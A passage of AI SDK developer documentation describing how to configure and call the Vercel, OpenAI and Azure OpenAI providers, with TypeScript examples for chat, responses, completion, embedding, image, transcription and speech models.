import { vercel } from '@ai-sdk/vercel';
If you need a customized setup, you can import createVercel from @ai-sdk/vercel and create a provider instance with your settings:
import { createVercel } from '@ai-sdk/vercel';
const vercel = createVercel({
apiKey: process.env.VERCEL_API_KEY ?? '',
});
You can use the following optional settings to customize the Vercel provider instance:
- baseURL string: Use a different URL prefix for API calls. The default prefix is https://api.v0.dev/v1.
- apiKey string: API key that is being sent using the Authorization header. It defaults to the VERCEL_API_KEY environment variable.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
Language Models
You can create language models using a provider instance. The first argument is the model ID, for example:
import { vercel } from '@ai-sdk/vercel';
import { generateText } from 'ai';
const { text } = await generateText({
model: vercel('v0-1.0-md'),
prompt: 'Create a Next.js AI chatbot',
});
Vercel language models can also be used in the streamText function (see AI SDK Core).
Example with AI SDK
import { generateText } from 'ai';
import { createVercel } from '@ai-sdk/vercel';
const vercel = createVercel({
baseURL: 'https://api.v0.dev/v1',
apiKey: process.env.VERCEL_API_KEY,
});
const { text } = await generateText({
model: vercel('v0-1.0-md'),
prompt: 'Create a Next.js AI chatbot with authentication',
});
Models
v0-1.0-md
The v0-1.0-md model is the default model served by the v0 API.
Capabilities:
- Supports text and image inputs (multimodal)
- Supports function/tool calls
- Streaming responses with low latency
- Optimized for frontend and full-stack web development
Model Capabilities
| Model | Image Input | Object Generation | Tool Usage | Tool Streaming |
|---|---|---|---|---|
| v0-1.0-md | | | | |
title: OpenAI description: Learn how to use the OpenAI provider for the AI SDK.
OpenAI Provider
The OpenAI provider contains language model support for the OpenAI responses, chat, and completion APIs, as well as embedding model support for the OpenAI embeddings API.
Setup
The OpenAI provider is available in the @ai-sdk/openai module. You can install it with
pnpm add @ai-sdk/openai
Provider Instance
You can import the default provider instance openai from @ai-sdk/openai:
import { openai } from '@ai-sdk/openai';
If you need a customized setup, you can import createOpenAI from @ai-sdk/openai and create a provider instance with your settings:
import { createOpenAI } from '@ai-sdk/openai';
const openai = createOpenAI({
// custom settings, e.g.
compatibility: 'strict', // strict mode, enable when using the OpenAI API
});
You can use the following optional settings to customize the OpenAI provider instance:
- baseURL string: Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://api.openai.com/v1.
- apiKey string: API key that is being sent using the Authorization header. It defaults to the OPENAI_API_KEY environment variable.
- name string: The provider name. You can set this when using OpenAI compatible providers to change the model provider property. Defaults to openai.
- organization string: OpenAI Organization.
- project string: OpenAI project.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
- compatibility "strict" | "compatible": OpenAI compatibility mode. Should be set to strict when using the OpenAI API, and compatible when using 3rd party providers. In compatible mode, newer information such as streamOptions is not sent, resulting in NaN token usage. Defaults to 'compatible'.
Language Models
The OpenAI provider instance is a function that you can invoke to create a language model:
const model = openai('gpt-4-turbo');
It automatically selects the correct API based on the model id. You can also pass additional settings in the second argument:
const model = openai('gpt-4-turbo', {
// additional settings
});
The available options depend on the API that's automatically chosen for the model (see below).
If you want to explicitly select a specific model API, you can use .chat or .completion.
Example
You can use OpenAI language models to generate text with the generateText function:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text } = await generateText({
model: openai('gpt-4-turbo'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
OpenAI language models can also be used in the streamText, generateObject, and streamObject functions
(see AI SDK Core).
Chat Models
You can create models that call the OpenAI chat API using the .chat() factory method.
The first argument is the model id, e.g. gpt-4.
The OpenAI chat models support tool calls and some have multi-modal capabilities.
const model = openai.chat('gpt-3.5-turbo');
OpenAI chat models also support some model-specific settings that are not part of the standard call settings. You can pass them as an options argument:
const model = openai.chat('gpt-3.5-turbo', {
logitBias: {
// optional likelihood for specific tokens
'50256': -100,
},
user: 'test-user', // optional unique user identifier
});
The following optional settings are available for OpenAI chat models:
- logitBias Record<number, number>: Modifies the likelihood of specified tokens appearing in the completion. Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token. As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.
- logprobs boolean | number: Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving. Setting to true will return the log probabilities of the tokens that were generated. Setting to a number will return the log probabilities of the top n tokens that were generated.
- parallelToolCalls boolean: Whether to enable parallel function calling during tool use. Defaults to true.
- useLegacyFunctionCalls boolean: Whether to use legacy function calling. Defaults to false. Required by some open source inference engines which do not support the tools API. May also provide a workaround for parallelToolCalls resulting in the provider buffering tool calls, which causes streamObject to be non-streaming. Prefer setting parallelToolCalls: false over this option.
- structuredOutputs boolean: Whether to use structured outputs. Defaults to false for normal models, and true for reasoning models. When enabled, tool calls and object generation will be strict and follow the provided schema.
- user string: A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
- downloadImages boolean: Automatically download images and pass the image as data to the model. OpenAI supports image URLs for public models, so this is only needed for private models or when the images are not publicly accessible. Defaults to false.
- simulateStreaming boolean: Simulates streaming by using a normal generate call and returning it as a stream. Enable this if the model that you are using does not support streaming. Defaults to false.
- reasoningEffort 'low' | 'medium' | 'high': Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
Reasoning
OpenAI has introduced the o1, o3, and o4 series of reasoning models.
Currently, o4-mini, o3, o3-mini, o1, o1-mini, and o1-preview are available.
Reasoning models currently only generate text, have several limitations, and are only supported using generateText and streamText.
They support additional settings and response metadata:
- You can use providerOptions to set the reasoningEffort option (or alternatively the reasoningEffort model setting), which determines the amount of reasoning the model performs.
- You can use the response providerMetadata to access the number of reasoning tokens that the model generated.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text, usage, providerMetadata } = await generateText({
model: openai('o3-mini'),
prompt: 'Invent a new holiday and describe its traditions.',
providerOptions: {
openai: {
reasoningEffort: 'low',
},
},
});
console.log(text);
console.log('Usage:', {
...usage,
reasoningTokens: providerMetadata?.openai?.reasoningTokens,
});
Structured Outputs
You can enable OpenAI structured outputs by setting the structuredOutputs option to true.
Structured outputs are a form of grammar-guided generation.
The JSON schema is used as a grammar and the outputs will always conform to the schema.
import { openai } from '@ai-sdk/openai';
import { generateObject } from 'ai';
import { z } from 'zod';
const result = await generateObject({
model: openai('gpt-4o-2024-08-06', {
structuredOutputs: true,
}),
schemaName: 'recipe',
schemaDescription: 'A recipe for lasagna.',
schema: z.object({
name: z.string(),
ingredients: z.array(
z.object({
name: z.string(),
amount: z.string(),
}),
),
steps: z.array(z.string()),
}),
prompt: 'Generate a lasagna recipe.',
});
console.log(JSON.stringify(result.object, null, 2));
Note that OpenAI structured outputs restrict the supported schemas. For example, optional schema properties are not supported:
you need to change Zod .nullish() and .optional() to .nullable().
PDF support
The OpenAI Chat API supports reading PDF files.
You can pass PDF files as part of the message content using the file type:
const result = await generateText({
model: openai('gpt-4o'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mimeType: 'application/pdf',
filename: 'ai.pdf', // optional
},
],
},
],
});
The model will have access to the contents of the PDF file and
respond to questions about it.
The PDF file should be passed using the data field,
and the mimeType should be set to 'application/pdf'.
Predicted Outputs
OpenAI supports predicted outputs for gpt-4o and gpt-4o-mini.
Predicted outputs help you reduce latency by allowing you to specify a base text that the model should modify.
You can enable predicted outputs by adding the prediction option to the providerOptions.openai object:
const result = streamText({
model: openai('gpt-4o'),
messages: [
{
role: 'user',
content: 'Replace the Username property with an Email property.',
},
{
role: 'user',
content: existingCode,
},
],
providerOptions: {
openai: {
prediction: {
type: 'content',
content: existingCode,
},
},
},
});
OpenAI provides usage information for predicted outputs (acceptedPredictionTokens and rejectedPredictionTokens).
You can access it in the providerMetadata object.
const openaiMetadata = (await result.providerMetadata)?.openai;
const acceptedPredictionTokens = openaiMetadata?.acceptedPredictionTokens;
const rejectedPredictionTokens = openaiMetadata?.rejectedPredictionTokens;
Image Detail
You can use the openai provider option to set the image input detail to high, low, or auto:
const result = await generateText({
model: openai('gpt-4o'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'Describe the image in detail.' },
{
type: 'image',
image:
'https://github.com/vercel/ai/blob/main/examples/ai-core/data/comic-cat.png?raw=true',
// OpenAI specific options - image detail:
providerOptions: {
openai: { imageDetail: 'low' },
},
},
],
},
],
});
Distillation
OpenAI supports model distillation for some models.
If you want to store a generation for use in the distillation process, you can add the store option to the providerOptions.openai object.
This will save the generation to the OpenAI platform for later use in distillation.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
import 'dotenv/config';
async function main() {
const { text, usage } = await generateText({
model: openai('gpt-4o-mini'),
prompt: 'Who worked on the original macintosh?',
providerOptions: {
openai: {
store: true,
metadata: {
custom: 'value',
},
},
},
});
console.log(text);
console.log();
console.log('Usage:', usage);
}
main().catch(console.error);
Prompt Caching
OpenAI has introduced Prompt Caching for supported models
including gpt-4o, gpt-4o-mini, o1-preview, and o1-mini.
- Prompt caching is automatically enabled for these models when the prompt is 1024 tokens or longer. It does not need to be explicitly enabled.
- You can use the response providerMetadata to access the number of prompt tokens that were a cache hit.
- Note that caching behavior is dependent on load on OpenAI's infrastructure. Prompt prefixes generally remain in the cache following 5-10 minutes of inactivity before they are evicted, but during off-peak periods they may persist for up to an hour.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text, usage, providerMetadata } = await generateText({
model: openai('gpt-4o-mini'),
prompt: `A 1024-token or longer prompt...`,
});
console.log(`usage:`, {
...usage,
cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});
Audio Input
With the gpt-4o-audio-preview model, you can pass audio files to the model.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai('gpt-4o-audio-preview'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'What is the audio saying?' },
{
type: 'file',
mimeType: 'audio/mpeg',
data: fs.readFileSync('./data/galileo.mp3'),
},
],
},
],
});
Responses Models
You can use the OpenAI responses API with the openai.responses(modelId) factory method.
const model = openai.responses('gpt-4o-mini');
Further configuration can be done using OpenAI provider options.
You can validate the provider options using the OpenAIResponsesProviderOptions type.
import { openai, OpenAIResponsesProviderOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.responses('gpt-4o-mini'),
providerOptions: {
openai: {
parallelToolCalls: false,
store: false,
user: 'user_123',
// ...
} satisfies OpenAIResponsesProviderOptions,
},
// ...
});
The following provider options are available:
- parallelToolCalls boolean: Whether to use parallel tool calls. Defaults to true.
- store boolean: Whether to store the generation. Defaults to true.
- metadata Record<string, string>: Additional metadata to store with the generation.
- previousResponseId string: The ID of the previous response. You can use it to continue a conversation. Defaults to undefined.
- instructions string: Instructions for the model. They can be used to change the system or developer message when continuing a conversation using the previousResponseId option. Defaults to undefined.
- user string: A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Defaults to undefined.
- reasoningEffort 'low' | 'medium' | 'high': Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
- reasoningSummary 'auto' | 'detailed': Controls whether the model returns its reasoning process. Set to 'auto' for a condensed summary, 'detailed' for more comprehensive reasoning. Defaults to undefined (no reasoning summaries). When enabled, reasoning summaries appear in the stream as events with type 'reasoning' and in non-streaming responses within the reasoning field.
- strictSchemas boolean: Whether to use strict JSON schemas in tools and when generating JSON outputs. Defaults to true.
The OpenAI responses provider also returns provider-specific metadata:
const { providerMetadata } = await generateText({
model: openai.responses('gpt-4o-mini'),
});
const openaiMetadata = providerMetadata?.openai;
The following OpenAI-specific metadata is returned:
- responseId string: The ID of the response. Can be used to continue a conversation.
- cachedPromptTokens number: The number of prompt tokens that were a cache hit.
- reasoningTokens number: The number of reasoning tokens that the model generated.
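For example, you can combine the responseId metadata with the previousResponseId option to continue a conversation across calls. A minimal sketch (the prompts are placeholders):
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const first = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'Suggest a name for a coffee shop.',
});
const followUp = await generateText({
  model: openai.responses('gpt-4o-mini'),
  prompt: 'Explain why that name works.',
  providerOptions: {
    openai: {
      // continue from the first response
      previousResponseId: first.providerMetadata?.openai?.responseId,
    },
  },
});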
Web Search
The OpenAI responses provider supports web search through the openai.tools.webSearchPreview tool.
You can force the use of the web search tool by setting the toolChoice parameter to { type: 'tool', toolName: 'web_search_preview' }.
const result = await generateText({
model: openai.responses('gpt-4o-mini'),
prompt: 'What happened in San Francisco last week?',
tools: {
web_search_preview: openai.tools.webSearchPreview({
// optional configuration:
searchContextSize: 'high',
userLocation: {
type: 'approximate',
city: 'San Francisco',
region: 'California',
},
}),
},
// Force web search tool:
toolChoice: { type: 'tool', toolName: 'web_search_preview' },
});
// URL sources
const sources = result.sources;
Reasoning Summaries
For reasoning models like o3-mini, o3, and o4-mini, you can enable reasoning summaries to see the model's thought process. Different models support different summarizers—for example, o4-mini supports detailed summaries. Set reasoningSummary: "auto" to automatically receive the richest level available.
import { openai } from '@ai-sdk/openai';
import { streamText } from 'ai';
const result = streamText({
model: openai.responses('o4-mini'),
prompt: 'Tell me about the Mission burrito debate in San Francisco.',
providerOptions: {
openai: {
reasoningSummary: 'detailed', // 'auto' for condensed or 'detailed' for comprehensive
},
},
});
for await (const part of result.fullStream) {
if (part.type === 'reasoning') {
console.log(`Reasoning: ${part.textDelta}`);
} else if (part.type === 'text-delta') {
process.stdout.write(part.textDelta);
}
}
For non-streaming calls with generateText, the reasoning summaries are available in the reasoning field of the response:
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.responses('o3-mini'),
prompt: 'Tell me about the Mission burrito debate in San Francisco.',
providerOptions: {
openai: {
reasoningSummary: 'auto',
},
},
});
console.log('Reasoning:', result.reasoning);
Learn more about reasoning summaries in the OpenAI documentation.
PDF support
The OpenAI Responses API supports reading PDF files.
You can pass PDF files as part of the message content using the file type:
const result = await generateText({
model: openai.responses('gpt-4o'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mimeType: 'application/pdf',
filename: 'ai.pdf', // optional
},
],
},
],
});
The model will have access to the contents of the PDF file and
respond to questions about it.
The PDF file should be passed using the data field,
and the mimeType should be set to 'application/pdf'.
Structured Outputs
The OpenAI Responses API supports structured outputs. You can enforce structured outputs using generateObject or streamObject, which expose a schema option. Additionally, you can pass a Zod or JSON Schema object to the experimental_output option when using generateText or streamText.
// Using generateObject
const result = await generateObject({
model: openai.responses('gpt-4.1'),
schema: z.object({
recipe: z.object({
name: z.string(),
ingredients: z.array(
z.object({
name: z.string(),
amount: z.string(),
}),
),
steps: z.array(z.string()),
}),
}),
prompt: 'Generate a lasagna recipe.',
});
// Using generateText
const result = await generateText({
model: openai.responses('gpt-4.1'),
prompt: 'How do I make a pizza?',
experimental_output: Output.object({
schema: z.object({
ingredients: z.array(z.string()),
steps: z.array(z.string()),
}),
}),
});
Completion Models
You can create models that call the OpenAI completions API using the .completion() factory method.
The first argument is the model id.
Currently only gpt-3.5-turbo-instruct is supported.
const model = openai.completion('gpt-3.5-turbo-instruct');
OpenAI completion models also support some model-specific settings that are not part of the standard call settings. You can pass them as an options argument:
const model = openai.completion('gpt-3.5-turbo-instruct', {
echo: true, // optional, echo the prompt in addition to the completion
logitBias: {
// optional likelihood for specific tokens
'50256': -100,
},
suffix: 'some text', // optional suffix that comes after a completion of inserted text
user: 'test-user', // optional unique user identifier
});
The following optional settings are available for OpenAI completion models:
- echo: boolean: Echo back the prompt in addition to the completion.
- logitBias Record<number, number>: Modifies the likelihood of specified tokens appearing in the completion. Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token. As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.
- logprobs boolean | number: Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving. Setting to true will return the log probabilities of the tokens that were generated. Setting to a number will return the log probabilities of the top n tokens that were generated.
- suffix string: The suffix that comes after a completion of inserted text.
- user string: A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
Model Capabilities
| Model | Image Input | Audio Input | Object Generation | Tool Usage |
|---|---|---|---|---|
| gpt-4.1 | | | | |
| gpt-4.1-mini | | | | |
| gpt-4.1-nano | | | | |
| gpt-4o | | | | |
| gpt-4o-mini | | | | |
| gpt-4o-audio-preview | | | | |
| gpt-4-turbo | | | | |
| gpt-4 | | | | |
| gpt-3.5-turbo | | | | |
| o1 | | | | |
| o1-mini | | | | |
| o1-preview | | | | |
| o3-mini | | | | |
| o3 | | | | |
| o4-mini | | | | |
| chatgpt-4o-latest | | | | |
| gpt-5 | | | | |
| gpt-5-mini | | | | |
| gpt-5-nano | | | | |
Embedding Models
You can create models that call the OpenAI embeddings API
using the .embedding() factory method.
const model = openai.embedding('text-embedding-3-large');
OpenAI embedding models support several additional settings. You can pass them as an options argument:
const model = openai.embedding('text-embedding-3-large', {
  dimensions: 512, // optional, number of dimensions for the embedding
  user: 'test-user', // optional unique user identifier
});
The following optional settings are available for OpenAI embedding models:
- dimensions: number: The number of dimensions the resulting output embeddings should have. Only supported in text-embedding-3 and later models.
- user string: A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
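For example, a minimal sketch that computes a single embedding with the embed function from the AI SDK:
import { openai } from '@ai-sdk/openai';
import { embed } from 'ai';
const { embedding } = await embed({
  model: openai.embedding('text-embedding-3-small'),
  value: 'sunny day at the beach',
});
console.log(embedding.length); // number of dimensions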
Model Capabilities
| Model | Default Dimensions | Custom Dimensions |
|---|---|---|
| text-embedding-3-large | 3072 | Supported |
| text-embedding-3-small | 1536 | Supported |
| text-embedding-ada-002 | 1536 | Not supported |
Image Models
You can create models that call the OpenAI image generation API
using the .image() factory method.
const model = openai.image('dall-e-3');
Model Capabilities
| Model | Sizes |
|---|---|
| gpt-image-1 | 1024x1024, 1536x1024, 1024x1536 |
| dall-e-3 | 1024x1024, 1792x1024, 1024x1792 |
| dall-e-2 | 256x256, 512x512, 1024x1024 |
You can pass optional providerOptions to the image model. These are prone to change by OpenAI and are model dependent. For example, the gpt-image-1 model supports the quality option:
const { image } = await generateImage({
model: openai.image('gpt-image-1'),
prompt: 'A salamander at sunrise in a forest pond in the Seychelles.',
providerOptions: {
openai: { quality: 'high' },
},
});
For more on generateImage() see Image Generation.
For more information on the available OpenAI image model options, see the OpenAI API reference.
Transcription Models
You can create models that call the OpenAI transcription API
using the .transcription() factory method.
The first argument is the model id e.g. whisper-1.
const model = openai.transcription('whisper-1');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format will improve accuracy and latency.
import { experimental_transcribe as transcribe } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await transcribe({
model: openai.transcription('whisper-1'),
audio: new Uint8Array([1, 2, 3, 4]),
providerOptions: { openai: { language: 'en' } },
});
The following provider options are available:
- timestampGranularities string[]: The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.
- language string: The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.
- prompt string: An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.
- temperature number: The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.
- include string[]: Additional information to include in the transcription response.
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| whisper-1 | | | | |
| gpt-4o-mini-transcribe | | | | |
| gpt-4o-transcribe | | | | |
Speech Models
You can create models that call the OpenAI speech API
using the .speech() factory method.
The first argument is the model id e.g. tts-1.
const model = openai.speech('tts-1');
You can also pass additional provider-specific options using the providerOptions argument, for example to supply a voice to use for the generated audio.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
providerOptions: { openai: {} },
});
The following provider options are available:
- instructions string: Control the voice of your generated audio with additional instructions, e.g. "Speak in a slow and steady tone". Does not work with tts-1 or tts-1-hd. Optional.
- response_format string: The output format of the audio. Supported formats are mp3, opus, aac, flac, wav, and pcm. Defaults to mp3. Optional.
- speed number: The speed of the generated audio. Select a value from 0.25 to 4.0. Defaults to 1.0. Optional.
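For example, a sketch that sets the output format and speed through providerOptions, using the option names from the list above:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await generateSpeech({
  model: openai.speech('tts-1'),
  text: 'Hello, world!',
  providerOptions: {
    openai: {
      response_format: 'wav', // mp3 (default), opus, aac, flac, wav, or pcm
      speed: 1.2, // 0.25 to 4.0, defaults to 1.0
    },
  },
});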
Model Capabilities
| Model | Instructions |
|---|---|
| tts-1 | Not supported |
| tts-1-hd | Not supported |
| gpt-4o-mini-tts | Supported |
title: Azure OpenAI description: Learn how to use the Azure OpenAI provider for the AI SDK.
Azure OpenAI Provider
The Azure OpenAI provider contains language model support for the Azure OpenAI chat API.
Setup
The Azure OpenAI provider is available in the @ai-sdk/azure module. You can install it with
pnpm add @ai-sdk/azure
Provider Instance
You can import the default provider instance azure from @ai-sdk/azure:
import { azure } from '@ai-sdk/azure';
If you need a customized setup, you can import createAzure from @ai-sdk/azure and create a provider instance with your settings:
import { createAzure } from '@ai-sdk/azure';
const azure = createAzure({
resourceName: 'your-resource-name', // Azure resource name
apiKey: 'your-api-key',
});
You can use the following optional settings to customize the Azure OpenAI provider instance:
- resourceName string: Azure resource name. It defaults to the AZURE_RESOURCE_NAME environment variable. The resource name is used in the assembled URL: https://{resourceName}.openai.azure.com/openai/deployments/{modelId}{path}. You can use baseURL instead to specify the URL prefix.
- apiKey string: API key that is being sent using the api-key header. It defaults to the AZURE_API_KEY environment variable.
- apiVersion string: Sets a custom api version. Defaults to 2024-10-01-preview.
- baseURL string: Use a different URL prefix for API calls, e.g. to use proxy servers. Either this or resourceName can be used. When a baseURL is provided, the resourceName is ignored. With a baseURL, the resolved URL is {baseURL}/{modelId}{path}.
- headers Record<string,string>: Custom headers to include in the requests.
- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>: Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
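For example, a sketch of a provider instance configured with baseURL instead of resourceName (the proxy URL is a placeholder):
import { createAzure } from '@ai-sdk/azure';
const azure = createAzure({
  // resolved URL is {baseURL}/{modelId}{path}, so resourceName is not needed
  baseURL: 'https://your-proxy.example.com/openai/deployments',
  apiKey: process.env.AZURE_API_KEY,
  apiVersion: '2024-10-01-preview',
});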
Language Models
The Azure OpenAI provider instance is a function that you can invoke to create a language model:
const model = azure('your-deployment-name');
You need to pass your deployment name as the first argument.
Reasoning Models
Azure exposes the thinking of DeepSeek-R1 in the generated text using the <think> tag.
You can use the extractReasoningMiddleware to extract this reasoning and expose it as a reasoning property on the result:
import { azure } from '@ai-sdk/azure';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const enhancedModel = wrapLanguageModel({
model: azure('your-deepseek-r1-deployment-name'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
You can then use that enhanced model in functions like generateText and streamText.
Example
You can use OpenAI language models to generate text with the generateText function:
import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';
const { text } = await generateText({
model: azure('your-deployment-name'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
OpenAI language models can also be used in the streamText, generateObject, and streamObject functions
(see AI SDK Core).
Provider Options
When using OpenAI language models on Azure, you can configure provider-specific options using providerOptions.openai. More information on the available configuration options can be found on the OpenAI provider page.
const messages = [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is the capital of the moon?',
},
{
type: 'image',
image: 'https://example.com/image.png',
providerOptions: {
openai: { imageDetail: 'low' },
},
},
],
},
];
const { text } = await generateText({
  model: azure('your-deployment-name'),
  messages,
  providerOptions: {
    openai: {
      reasoningEffort: 'low',
    },
  },
});
Chat Models
Azure OpenAI chat models also support some model-specific settings that are not part of the standard call settings. You can pass them as an options argument:
const model = azure('your-deployment-name', {
logitBias: {
// optional likelihood for specific tokens
'50256': -100,
},
user: 'test-user', // optional unique user identifier
});
The following optional settings are available for OpenAI chat models:
- logitBias Record<number, number>: Modifies the likelihood of specified tokens appearing in the completion. Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token. As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.
- logprobs boolean | number: Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving. Setting to true will return the log probabilities of the tokens that were generated. Setting to a number will return the log probabilities of the top n tokens that were generated.
- parallelToolCalls boolean: Whether to enable parallel function calling during tool use. Defaults to true.
- user string: A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
Responses Models
You can use the Azure OpenAI responses API with the azure.responses(deploymentName) factory method.
const model = azure.responses('your-deployment-name');
Further configuration can be done using OpenAI provider options.
You can validate the provider options using the OpenAIResponsesProviderOptions type.
import { azure, OpenAIResponsesProviderOptions } from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure.responses('your-deployment-name'),
providerOptions: {
openai: {
parallelToolCalls: false,
store: false,
user: 'user_123',
// ...
} satisfies OpenAIResponsesProviderOptions,
},
// ...
});
The following provider options are available:
- parallelToolCalls boolean: Whether to use parallel tool calls. Defaults to true.
- store boolean: Whether to store the generation. Defaults to true.
- metadata Record<string, string>: Additional metadata to store with the generation.
- previousResponseId string: The ID of the previous response. You can use it to continue a conversation. Defaults to undefined.
- instructions string: Instructions for the model. They can be used to change the system or developer message when continuing a conversation using the previousResponseId option. Defaults to undefined.
- user string: A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Defaults to undefined.
- reasoningEffort 'low' | 'medium' | 'high': Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.
- strictSchemas boolean: Whether to use strict JSON schemas in tools and when generating JSON outputs. Defaults to true.
The Azure OpenAI responses provider also returns provider-specific metadata:
const { providerMetadata } = await generateText({
model: azure.responses('your-deployment-name'),
});
const openaiMetadata = providerMetadata?.openai;
The following OpenAI-specific metadata is returned:
- responseId string: The ID of the response. Can be used to continue a conversation.
- cachedPromptTokens number: The number of prompt tokens that were a cache hit.
- reasoningTokens number: The number of reasoning tokens that the model generated.
PDF support
The Azure OpenAI Responses API supports reading PDF files.
You can pass PDF files as part of the message content using the file type:
const result = await generateText({
model: azure.responses('your-deployment-name'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mimeType: 'application/pdf',
filename: 'ai.pdf', // optional
},
],
},
],
});
The model will have access to the contents of the PDF file and
respond to questions about it.
The PDF file should be passed using the data field,
and the mimeType should be set to 'application/pdf'.
Completion Models
You can create models that call the completions API using the .completion() factory method.
The first argument is the model id.
Currently only gpt-35-turbo-instruct is supported.
const model = azure.completion('your-gpt-35-turbo-instruct-deployment');
OpenAI completion models also support some model-specific settings that are not part of the standard call settings. You can pass them as an options argument:
const model = azure.completion('your-gpt-35-turbo-instruct-deployment', {
echo: true, // optional, echo the prompt in addition to the completion
logitBias: {
// optional likelihood for specific tokens
'50256': -100,
},
suffix: 'some text', // optional suffix that comes after a completion of inserted text
user: 'test-user', // optional unique user identifier
});
The following optional settings are available for Azure OpenAI completion models:
- echo: boolean: Echo back the prompt in addition to the completion.
- logitBias Record<number, number>: Modifies the likelihood of specified tokens appearing in the completion. Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token. As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.
- logprobs boolean | number: Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving. Setting to true will return the log probabilities of the tokens that were generated. Setting to a number will return the log probabilities of the top n tokens that were generated.
